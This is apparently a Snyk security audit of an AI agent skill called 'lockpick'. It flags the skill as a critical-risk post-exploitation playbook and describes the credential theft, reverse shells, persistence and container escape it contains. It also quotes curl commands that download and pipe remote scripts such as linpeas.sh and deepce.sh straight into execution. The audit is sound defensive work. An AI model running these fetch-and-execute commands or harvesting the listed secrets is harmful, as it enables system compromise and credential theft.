lockpick
Fail
Audited by Snyk on May 6, 2026
Risk Level: CRITICAL
Full Analysis
HIGH W007: Insecure credential handling detected in skill instructions.
- Insecure credential handling detected (high risk: 1.00). The skill explicitly directs reading secrets (AWS creds, WireGuard/OpenVPN keys, k8s serviceaccount token, /etc/ipsec.secrets, SSH keys, etc.), shows commands that inject those values into requests (e.g., Authorization: Bearer $TOKEN) and captures command output/evidence, which requires handling and potentially outputting secret values verbatim.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). This content is an explicit offensive post‑exploitation/privesc playbook containing step‑by‑step instructions for credential theft, data exfiltration, remote code execution (reverse shells and exec payloads), privilege escalation, persistence (cron/startup modifications, adding SSH keys), container/host escape via docker.sock and privileged capabilities, and Kubernetes/Cloud secret harvesting—all behaviors that enable deliberate system compromise and backdoor installation and are highly likely to be abused.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 0.90). The skill's workflow and reference files explicitly instruct fetching and executing user-hosted tooling from public sites (e.g., references/linux-privesc.md shows curl commands to download linpeas.sh, pspy, and linux-exploit-suggester from GitHub and references/container-breakout.md curls deepce.sh from GitHub), so the agent is expected to ingest untrusted third‑party content whose output can materially influence subsequent actions.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 0.90). The skill explicitly instructs downloading and executing remote scripts at runtime (e.g., curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/lp.sh && /tmp/lp.sh and similar curl https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh), so external URLs are used to fetch and run code that directly controls the agent's actions.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). This skill explicitly guides offensive actions that obtain/bypass sudo, modify system and service files (e.g., /etc/passwd, systemd units), create privileged pods and run kernel exploits—directly instructing state-changing, high-risk operations on the host.